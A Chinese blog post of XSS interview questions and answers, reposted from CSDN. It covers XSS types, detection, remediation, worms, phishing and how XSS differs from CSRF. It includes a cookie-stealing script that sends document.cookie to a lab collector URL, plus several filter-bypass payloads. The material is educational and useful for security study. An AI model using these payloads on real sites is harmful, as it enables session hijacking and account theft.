<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>xss面试题 | blog小窝</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="能简要介绍一下 XSS 的原理吗？ 能简要介绍一下 XSS 的分类吗？ 能简要介绍一下 XSS 有哪些危害吗？ 能详细介绍一下反射型 xss 攻击流程吗？ 能详细介绍一下存储型 xss 攻击流程吗？ 反射型 xss 与 dom 型 xss 有哪些区别？ 能说一说三类 XSS 有哪些区别吗？ XSS 检测流程 DOM 型 XSS 怎么测试？ 对于 XSS 怎么修复你有什么建议？ XSS 是如何盗">
<meta property="og:type" content="article">
<meta property="og:title" content="xss面试题">
<meta property="og:url" content="https://my011215.github.io/2022/11/23/interview/xss%E9%9D%A2%E8%AF%95%E9%A2%98/index.html">
<meta property="og:site_name" content="blog小窝">
<meta property="og:description" content="能简要介绍一下 XSS 的原理吗？ 能简要介绍一下 XSS 的分类吗？ 能简要介绍一下 XSS 有哪些危害吗？ 能详细介绍一下反射型 xss 攻击流程吗？ 能详细介绍一下存储型 xss 攻击流程吗？ 反射型 xss 与 dom 型 xss 有哪些区别？ 能说一说三类 XSS 有哪些区别吗？ XSS 检测流程 DOM 型 XSS 怎么测试？ 对于 XSS 怎么修复你有什么建议？ XSS 是如何盗">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-11-23T15:23:39.000Z">
<meta property="article:modified_time" content="2022-11-23T14:28:58.910Z">
<meta property="article:author" content="草莓布丁">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="blog小窝" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.4.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">blog小窝</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/categories/%E5%AD%A6%E4%B9%A0%E5%88%86%E4%BA%AB/">学习分享</a>
        
          <a class="main-nav-link" href="/categories/web%E5%AE%89%E5%85%A8/">安全</a>
        
          <a class="main-nav-link" href="/categories/%E5%85%B4%E8%B6%A3/">兴趣</a>
        
          <a class="main-nav-link" href="/richang">日常</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://my011215.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-interview/xss面试题" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2022/11/23/interview/xss%E9%9D%A2%E8%AF%95%E9%A2%98/" class="article-date">
  <time datetime="2022-11-23T15:23:39.000Z" itemprop="datePublished">2022-11-23</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a>►<a class="article-category-link" href="/categories/web%E5%AE%89%E5%85%A8/%E9%9D%A2%E8%AF%95%E9%A2%98/">面试题</a>►<a class="article-category-link" href="/categories/web%E5%AE%89%E5%85%A8/%E9%9D%A2%E8%AF%95%E9%A2%98/XSS/">XSS</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      xss面试题
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <!-- toc -->
<ul>
<li><a href="#%E8%83%BD%E7%AE%80%E8%A6%81%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B-xss-%E7%9A%84%E5%8E%9F%E7%90%86%E5%90%97">能简要介绍一下 XSS 的原理吗？</a></li>
<li><a href="#%E8%83%BD%E7%AE%80%E8%A6%81%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B-xss-%E7%9A%84%E5%88%86%E7%B1%BB%E5%90%97">能简要介绍一下 XSS 的分类吗？</a></li>
<li><a href="#%E8%83%BD%E7%AE%80%E8%A6%81%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B-xss-%E6%9C%89%E5%93%AA%E4%BA%9B%E5%8D%B1%E5%AE%B3%E5%90%97">能简要介绍一下 XSS 有哪些危害吗？</a></li>
<li><a href="#%E8%83%BD%E8%AF%A6%E7%BB%86%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B%E5%8F%8D%E5%B0%84%E5%9E%8B-xss-%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B%E5%90%97">能详细介绍一下反射型 xss 攻击流程吗？</a></li>
<li><a href="#%E8%83%BD%E8%AF%A6%E7%BB%86%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B%E5%AD%98%E5%82%A8%E5%9E%8B-xss-%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B%E5%90%97">能详细介绍一下存储型 xss 攻击流程吗？</a></li>
<li><a href="#%E5%8F%8D%E5%B0%84%E5%9E%8B-xss-%E4%B8%8E-dom-%E5%9E%8B-xss-%E6%9C%89%E5%93%AA%E4%BA%9B%E5%8C%BA%E5%88%AB">反射型 xss 与 dom 型 xss 有哪些区别？</a></li>
<li><a href="#%E8%83%BD%E8%AF%B4%E4%B8%80%E8%AF%B4%E4%B8%89%E7%B1%BB-xss-%E6%9C%89%E5%93%AA%E4%BA%9B%E5%8C%BA%E5%88%AB%E5%90%97">能说一说三类 XSS 有哪些区别吗？</a></li>
<li><a href="#xss%E6%A3%80%E6%B5%8B%E6%B5%81%E7%A8%8B">XSS 检测流程</a></li>
<li><a href="#dom-%E5%9E%8B-xss-%E6%80%8E%E4%B9%88%E6%B5%8B%E8%AF%95">DOM 型 XSS 怎么测试？</a></li>
<li><a href="#%E5%AF%B9%E4%BA%8E-xss-%E6%80%8E%E4%B9%88%E4%BF%AE%E5%A4%8D%E4%BD%A0%E6%9C%89%E4%BB%80%E4%B9%88%E5%BB%BA%E8%AE%AE">对于 XSS 怎么修复你有什么建议？</a></li>
<li><a href="#xss%E6%98%AF%E5%A6%82%E4%BD%95%E7%9B%97%E5%8F%96cookie%E7%9A%84">XSS 是如何盗取 COOKIE 的？</a></li>
<li><a href="#%E8%83%BD%E7%AE%80%E5%8D%95%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B-xss-%E8%A0%95%E8%99%AB%E5%90%97">能简单介绍一下 XSS 蠕虫吗？</a></li>
<li><a href="#xss%E8%A0%95%E8%99%AB%E4%B8%8E%E4%BC%A0%E7%BB%9F%E8%A0%95%E8%99%AB%E7%9B%B8%E6%AF%94%E6%9C%89%E4%BB%80%E4%B9%88%E4%B8%8D%E5%90%8C%E7%82%B9">XSS 蠕虫与传统蠕虫相比，有什么不同点</a></li>
<li><a href="#%E8%83%BD%E8%AF%B4%E4%B8%80%E4%BA%9B%E5%B8%B8%E8%A7%81%E7%9A%84-xss-%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E5%90%97">能说一些常见的 XSS 绕过方式吗？</a></li>
<li><a href="#%E5%90%AC%E8%AF%B4%E5%8F%AF%E4%BB%A5%E7%94%A8-xss-%E9%92%93%E9%B1%BC%E6%98%AF%E7%9C%9F%E7%9A%84%E5%90%97">听说可以用 XSS 钓鱼，是真的吗？</a></li>
<li><a href="#csrf-%E4%B8%8E-xss-%E7%9A%84%E5%8C%BA%E5%88%AB">CSRF 与 XSS 的区别</a></li>
<li><a href="#xss-%E5%92%8C-javascript-%E6%B3%A8%E5%85%A5%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB">XSS 和 Javascript 注入有什么区别？</a></li>
<li><a href="#%E4%BB%80%E4%B9%88%E6%98%AFxss%E7%9B%B2%E6%89%93">什么是 xss 盲打？</a></li>
<li><a href="#%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5%E4%B8%AD%E7%9A%84%E5%90%8C%E6%BA%90%E9%9C%80%E8%A6%81%E8%BE%BE%E5%88%B0%E4%BB%80%E4%B9%88%E6%9D%A1%E4%BB%B6">同源策略中的同源需要达到什么条件？</a></li>
</ul>
<!-- tocstop -->
<p>————————————————<br>
 版权声明：本文为 CSDN 博主「_PowerShell」的原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接及本声明。<br>
原文链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_51577576/article/details/127965783">https://blog.csdn.net/qq_51577576/article/details/127965783</a></p>
<p>转发博文 <a target="_blank" rel="noopener" href="http://t.csdn.cn/zjs1R">http://t.csdn.cn/zjs1R</a></p>
<h2><span id="能简要介绍一下-xss-的原理吗"> 能简要介绍一下 XSS 的原理吗？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">XSS攻击通常是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java、 VBScript、 LiveScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后，攻击者可能得到包括但不限于更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。</span><br><span class="line">简单来说：就是程序对输入输出没有做合适的处理，导致攻击者构造的字符输出到前端时被浏览器执行当作有效代码解析执行从而产生危害</span><br></pre></td></tr></table></figure>
<span id="more"></span>  
<h2><span id="能简要介绍一下-xss-的分类吗"> 能简要介绍一下 XSS 的分类吗？</span></h2>
<p>1、反射型</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">反射型XSS也被称为非持久性XSS，当用户访问一个带有XSS代码的HTML请求时，服务器端接收数据后处理，然后把带有XSS的数据发送到浏览器，浏览器解析这段带有XSS代码的数据后，就造成XSS漏洞，这个过程就像一次反射，所以叫反射型XSS。</span><br><span class="line">用户提交的数据中可以构造代码来执行，从而实现窃取用户信息等攻击。需要诱使用户“点击”一个恶意链接，才能攻击成功</span><br></pre></td></tr></table></figure>
<p>2、储存型</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">存储型XSS又被称为持久性XSS，存储型XSS是最危险的一种跨站脚本漏洞，当攻击者提交一段 XSS代码后，被服务端接收并存储，当攻击者或用户再次访问某个页面时，这段XSS代码被程序读出来响应给浏览器，造成XSS跨站攻击，这是存储型XSS。</span><br><span class="line">存储型 XSS 会把用户输入的数据“存储”在服务器端。这种 XSS 具有很强的稳定性。用户点击存在存储型XSS且被嵌入xss代码的页面时，恶意xss代码就会执行。</span><br></pre></td></tr></table></figure>
<p>3、DOM 型</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">DOM 型的 XSS 注入与反射型原理类似，只不过 DOM 型的 XSS 注入不需要经过后端代码处理，而是在前端 JavaScript 调用 DOM 元素时可能产生的漏洞，可能触发 DOM 型 XSS 的 JavaScript 代码。</span><br><span class="line">通过修改页面的 DOM 节点形成的 XSS，称之为 DOM Based XSS。</span><br></pre></td></tr></table></figure>
<p>4、总的来说</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">总体来说XSS 危害最大。因为他存储在服务器端，所以不需要我们和被攻击者有任何接触，只要被攻击者访问了该页面就会遭受攻击。而反射型和 DOM 型的 XSS 则需要我们去诱使用户点击我们构造的恶意的URL，需要我们和用户有直接或者间接的接触，比如利用社会工程学或者利用在其他网页挂马的方式。</span><br></pre></td></tr></table></figure>
<h2><span id="能简要介绍一下-xss-有哪些危害吗"> 能简要介绍一下 XSS 有哪些危害吗？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1、流量劫持</span><br><span class="line">2、获取用户cookie信息，盗取账号</span><br><span class="line">3、篡改、删除页面信息（钓鱼）</span><br><span class="line">4、配合CSRF攻击，实施进一步攻击</span><br></pre></td></tr></table></figure>
<h2><span id="能详细介绍一下反射型-xss-攻击流程吗"> 能详细介绍一下反射型 xss 攻击流程吗？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">①发送带有XSS恶意脚本的链接</span><br><span class="line">②用户点击了恶意链接，访问了目标服务器</span><br><span class="line">③网站将XSS同正常页面返回到用户浏览器</span><br><span class="line">④用户浏览器解析了网页中的XSS恶意代码，向恶意服务器发起请求</span><br><span class="line">⑤黑客从自己搭建的恶意服务器中获取用户提交的信息</span><br></pre></td></tr></table></figure>
<h2><span id="能详细介绍一下存储型-xss-攻击流程吗"> 能详细介绍一下存储型 xss 攻击流程吗？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">①黑客在目标服务器上构造XSS恶意脚本，保存在数据库中</span><br><span class="line">②用户在网站登录状态下，访间了目标服务器，查看了存在恶意脚本的页面</span><br><span class="line">③网站将XSS同正常页面返回到用户浏览器</span><br><span class="line">④用户浏览器解析了网页中的XSS恶意代码，向恶意服务器发起请求</span><br><span class="line">⑤黑客从自己搭建的恶意服务器中获取用户提交的信息</span><br></pre></td></tr></table></figure>
<h2><span id="反射型-xss-与-dom-型-xss-有哪些区别"> 反射型 xss 与 dom 型 xss 有哪些区别？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1、反射型XSS是通过诱导用户点击我们构造好的恶意payload才会触发的 XSS。每次请求带 payload 的链接时页面应该是会带有特定的畸形数据的；</span><br><span class="line">DOM型是通过修改页面的DOM 节点形成的 XSS,通过 js 代码进行 dom 操作产生的 XSS，所以在请求的响应中我们甚至不一定会得到相应的畸形数据。</span><br><span class="line">2、反射型XSS需要联网，而DOM型不需要。</span><br><span class="line">3、反射型XSS在搜索框啊，或者是页面跳转啊这些地方；DOM是在DOM位置上，不取决于输入环境上</span><br></pre></td></tr></table></figure>
<h2><span id="能说一说三类-xss-有哪些区别吗"> 能说一说三类 XSS 有哪些区别吗？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1、被攻击对象的不同</span><br><span class="line">反射型XSS的被攻击对象一般是攻击者去寻找的</span><br><span class="line">存储型XSS是广撒网的方式或者指定的方式，危害性更大，范围更广</span><br><span class="line">DOM型XSS的被攻击对象其实和反射型XSS被攻击对象差不多，就是给攻击对象放送URL。</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">2、解析位置不同（个人感觉是反射型与存储型区别的本质）</span><br><span class="line">反射型XSS的脚本被解析的地方是浏览器</span><br><span class="line">存储型XSS的脚本被解析的地方是服务器</span><br><span class="line">DOM型XSS也是浏览器，但是反射型XSS需要联网，而DOM型不需要</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">3、存储时间不同</span><br><span class="line">反射型XSS是一次性</span><br><span class="line">存储型XSS是存储在服务器上，只要服务器不挂机或者是被干掉，就一直会有</span><br><span class="line">允许输入点的不同（这是DOM型与其他两种的区别）</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">4、位置不同</span><br><span class="line">反射型XSS在搜索框啊，或者是页面跳转啊这些地方</span><br><span class="line">存储型XSS一般是留言，或者用户存储的地方</span><br><span class="line">DOM是在DOM位置上，不取决于输入环境上</span><br></pre></td></tr></table></figure>
<h2><span id="xss-检测流程"> XSS 检测流程</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1、找到输入点（查询接口、留言板等）</span><br><span class="line">2、输入一组 特殊字符+唯一标识符 查看返回的源码 是否做出了相应的处理</span><br><span class="line">3、通过搜索定位到唯一字符 （构造闭合）</span><br><span class="line">4、构造脚本代码 （绕过） 查看是否执行成功 如果成功 存在xss漏洞</span><br></pre></td></tr></table></figure>
<h2><span id="dom-型-xss-怎么测试"> DOM 型 XSS 怎么测试？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">找到类似 document.write、innerHTML 赋值、outterHTML 赋值、window.location操作、写 javascript:后内容、eval、setTimeout 、setInterval 等直接执行之类的函数点。找到其变量，回溯变量来源观察是否可控，是否经过安全函数。</span><br></pre></td></tr></table></figure>
<h2><span id="对于-xss-怎么修复你有什么建议"> 对于 XSS 怎么修复你有什么建议？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">XSS 攻击有两大要素： 1. 攻击者提交恶意代码。 2. 浏览器执行恶意代码。所以需要严格控制好输入和输出。</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1、输入点控制</span><br><span class="line">不要在允许位置插入不可信数据</span><br><span class="line">在向HTML URL属性插入不可信数据前，进行URL解码。</span><br><span class="line">在向HTML元素内容、属性、属性值插入不可信数据前对HTML解码。</span><br><span class="line">在向HTML JavaScript Data Values插入不可信数据前，进行JavaScript解码。</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">2、输出点控制</span><br><span class="line">前端渲染把代码和数据分隔开。</span><br><span class="line">拼接HTML时对其进行转义，需要采用合适的转义库，对 HTML 模板各处插入点进行充分的转义。对于 HTML 转义通常只有一个规则，就是把 &amp; &lt; &gt; &quot; ’ / 这几个字符转义掉，确 实能起到一定的 XSS 防护作用，但并不完善。</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">3、其他</span><br><span class="line">除此之外，还有做 HTTPOnly 对 Cookie 劫持做限制。</span><br></pre></td></tr></table></figure>
<h2><span id="xss-是如何盗取-cookie-的"> XSS 是如何盗取 COOKIE 的？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1、逻辑关系：</span><br><span class="line">1、用户访问存在XSS页面，触发脚本</span><br><span class="line">2、xss页面返回“带恶意JS（document.location）&quot; 的页面</span><br><span class="line">3、用户PC执行恶意JS脚本， 发送窃取数据(cookies)</span><br><span class="line">4、攻击者伪造用户登录，造成破坏</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">2、实现代码演示：</span><br><span class="line">&lt;script&gt;document.location = &#x27;http://127.0.0.1/pikachu-master/pkxss/xcookie/cookie.php?cookie=&#x27; + document.cookie;&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">通过这个document.location实例做一个重定向（一旦他访问这个页面 javascript 就会执行 就会去访问 这个url 访问的时候就把cookie也带过去了）</span><br></pre></td></tr></table></figure>
<h2><span id="能简单介绍一下-xss-蠕虫吗"> 能简单介绍一下 XSS 蠕虫吗？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">XSS蠕虫是指一种具有自我传播能力的XSS攻击，杀伤力很大。引发XSS蠕虫的条件比较高，需要在用户之间发生交互行为的页面，这样才能形成有效的传播。一般要同时结合反射型XSS和存储型XSS。</span><br><span class="line">XSS蠕虫基于社会工程学诱使用户点击访问其发出的恶意邀请链接。社交网络用户接收到好友发出的相关链接时，往往是不加分辨地直接点击访问。活跃节点会比非活跃节点收到更多的蠕虫邀请链接，一旦受到感染，也会发送更多的蠕虫邀请链接。</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">XSS蠕虫传播过程可总结为以下步骤：</span><br><span class="line">(1)攻击者在Web页面植入恶意HTML代码。</span><br><span class="line">(2)发送伪装的邀请链接。</span><br><span class="line">(3)用户点击链接被感染。</span><br><span class="line">(4)向新感染用户的好友发送伪装的邀请链接。</span><br></pre></td></tr></table></figure>
<h2><span id="xss-蠕虫与传统蠕虫相比有什么不同点"> XSS 蠕虫与传统蠕虫相比，有什么不同点</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1、攻击载体不同。</span><br><span class="line">传统蠕虫的攻击与传播发生在用户节点之间，大规模的爆发极易引发网络阻塞。XSS蠕虫的攻击与传播从网络逻辑拓扑来看虽然是在用户节点之间，但从底层物理拓扑来看却是在用户节点与网站节点之间，资源消耗基本由功能强大的网站节点承担，蠕虫爆发不会引发网络阻塞和崩溃。</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">2、攻击方式不同。</span><br><span class="line">传统蠕虫多采用漏洞攻击的方法，利用程序缓冲区溢出进行传播。XSS蠕虫则采用利用社会工程学诱惑用户及跨站点脚本缺陷等多种方式。</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">3、攻击环境不同。</span><br><span class="line">传统蠕虫在指定的IPv4地址空间里寻找有漏洞的易感染节点。XSS蠕虫则专注于社交网络。</span><br></pre></td></tr></table></figure>
<h2><span id="能说一些常见的-xss-绕过方式吗"> 能说一些常见的 XSS 绕过方式吗？</span></h2>
<ul>
<li>转换<br>
 1、大小写混合绕过</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT&gt;aLeRT(111)&lt;/sCRIpt&gt;</span><br></pre></td></tr></table></figure>
<p>2、拼凑（双写）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scri&lt;script&gt;pt&gt;alert(111)&lt;/scri&lt;script&gt;pt&gt;</span><br></pre></td></tr></table></figure>
<p>3、使用一些注释进行干扰</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scri&lt;!--test--&gt;pt&gt;alert(111)&lt;/scri&lt;!--test--&gt;pt&gt;</span><br></pre></td></tr></table></figure>
<p>4、空格绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img srC= &quot;javasc ript:alert(&#x27;xss);&quot; &gt;</span><br></pre></td></tr></table></figure>
<p>5、Tab 绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img srC= &quot;javasc	ript:alert(&#x27;xss);&quot; &gt;</span><br></pre></td></tr></table></figure>
<p>6、回车绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src= &quot;jav</span><br><span class="line">ascript:</span><br><span class="line">alert(&#x27;xss&#x27;);&quot;〉</span><br></pre></td></tr></table></figure>
<p>7、除此之外，还有伪协议绕过，事件绕过等等。</p>
<ul>
<li>编码<br>
编码后在输入，后端可能过滤了某些字符串，但是没有过滤他的一些编码格式。编码方式可以是 JS 编码，HTML 实体编码，base64 编码，URL 编码等等。</li>
</ul>
<h2><span id="听说可以用-xss-钓鱼是真的吗"> 听说可以用 XSS 钓鱼，是真的吗？</span></h2>
<p>XSS 钓鱼是存在的，在实际的攻击场景当中，xss 钓鱼的场景也是非常多的，可以内嵌一些钓鱼页面或者钓鱼链接。这里我简单讲一讲存在存储型 XSS 的页面如何利用 basic 认证实现钓鱼：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1、已知存在一个存在存储型xss漏洞的页面 A 和攻击者后台 B。</span><br><span class="line">2、攻击这个可以利用该漏洞在 A 页面中内嵌一个请求（javascript或者其他）；</span><br><span class="line">3、这个请求是向远端的服务器（攻击者后台）发起请求；</span><br><span class="line">4、攻击者后台返回一个要求他进行bacis认证的头部，在用户界面上就会弹出一个要进行身份认证的提示框；</span><br><span class="line">5、用户一旦他输入了账号密码，这个账号密码就会发送到攻击者后台 B。</span><br></pre></td></tr></table></figure>
<h2><span id="csrf-与-xss-的区别"> CSRF 与 XSS 的区别</span></h2>
<p>CSRF 和 XSS 都是客户端攻击，它们滥用同源策略，利用 web 应用程序和不知情的用户之间的信任关系。但是，XSS 和 CSRF 攻击之间存在一些根本差异，包括：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1、在XSS攻击中，恶意代码存储在站点中；而在CSRF攻击中，恶意代码存储在受害用户访问的第三方站点中。</span><br><span class="line">2、XSS攻击遵循双向攻击模式，允许攻击者执行恶意脚本、访问响应，并将后续敏感数据发送到攻击者选择的目的地；CSRF是一种单向攻击机制，这意味着攻击者只能发起HTTP请求，但不能检索已发起请求的响应。</span><br><span class="line">3、在XSS攻击中，只要用户登录，就可以存储和交付有效载荷；而CSRF攻击则需要，CSRF攻击要求经过身份验证的用户处于活动会话中。</span><br><span class="line">4、XSS攻击提供执行恶意脚本来执行攻击者所选择的任何活动，从而扩大了攻击的范围；相反，CSRF攻击的范围有限，仅限于用户可以执行的操作，例如点击恶意链接或访问黑客的网站。</span><br></pre></td></tr></table></figure>
<h2><span id="xss-和-javascript-注入有什么区别"> XSS 和 Javascript 注入有什么区别？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">XSS 是一种客户端攻击，攻击者将恶意脚本部署到 Web 服务器中，由毫无戒心的用户浏览器执行；而Javascript 注入是一种服务器端攻击，黑客将恶意脚本发送到服务器，由解释器执行，就好像它是源代码的一部分一样。</span><br></pre></td></tr></table></figure>
<h2><span id="什么是-xss-盲打"> 什么是 xss 盲打？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xss盲打就是说我们输入的字符并不会在前端输出，只有他的管理员才能看到我们输入的内容，前端用户是看不到的。如果说管理员登陆后台之后 后台界面会把我们输入的内容进行输出的话，就意味着后台的管理人员会被x到。如果真的会被x到，那么这种场景的xss就叫xss的盲打</span><br></pre></td></tr></table></figure>
<h2><span id="同源策略中的同源需要达到什么条件"> 同源策略中的同源需要达到什么条件？</span></h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">一个域名地址由 协议、域名、端口、请求资源地址 等部分组成。同源需要两个 URL 的协议、域名和端口都相同。</span><br></pre></td></tr></table></figure>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://my011215.github.io/2022/11/23/interview/xss%E9%9D%A2%E8%AF%95%E9%A2%98/" data-id="clbelq66w000baotn0zeub2cj" class="article-share-link">Share</a>
      
      
    </footer>
